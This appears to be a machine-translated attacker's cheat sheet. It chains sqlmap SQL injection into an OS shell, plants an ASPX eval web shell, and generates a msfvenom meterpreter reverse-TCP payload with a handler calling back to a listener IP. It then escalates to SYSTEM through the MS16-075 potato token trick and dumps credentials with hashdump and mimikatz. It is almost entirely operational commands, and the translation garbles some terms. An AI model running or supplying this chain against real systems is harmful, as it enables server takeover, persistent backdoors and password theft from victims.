Summary of Sqlmap injection and ms16-075 right of withdrawal
(1) Sqlmap Execution order
Sqlmap.py-r 1**.***.***.***.txt
Sqlmap.py-r 1**.***.***.***.txt--is-db
Sqlmap.py-r 1**.***.***.***.txt--password--batch
Sqlmap.py-r 1**.***.***.***.txt--os-shell
(2) Execute command under Os-shell
Ipconfig
Dir c:/
echo "Thisis test" >e:\software\ams_noflow\t.txt
echo ^<%@ page language= "Jscript"%^>^<%eval (request.item["Pass"], "unsafe");%^> > E:\software\AMS_ Noflow\cmd.aspx
(3) Execution of commands under MSF
Generate Bounce XXX:
Msfvenom-p windows/meterpreter/reverse_tcp lhost=192.168.1.33 lport=4433-f exe-o 4433.exe
(4) MSF start-up and monitoring
Msfconsole
Use Exploit/multi/handler
Set PAYLOAD windows/meterpreter/reverse_tcp
Set Lhost 192.168.1.33 (actually an extranet IP address)
Set Lport 4433
Exploit
(5) ms16-075 the right to lift the order
Use Incognito
List_tokens-u
Execute-ch-f./potato.exe
List_tokens-u
Impersonate_token "NT Authority\\System"
Getuid
(6) Get the password
Run Hashdump
(7) Mimikatz for password acquisition
Load Mimikatz
Kerberos, LIVESSP, MSV, SSP, tspkg, wdigest (command-by-test, some display clear-text passwords)
Mimikatz_command:mimikatz Command Prompt window
(8) Mimikatz command line to get the password (not tested)
Privilege::d Ebug
Sekurlsa::logonpasswords
Summary of Sqlmap injection and ms16-075 right of withdrawal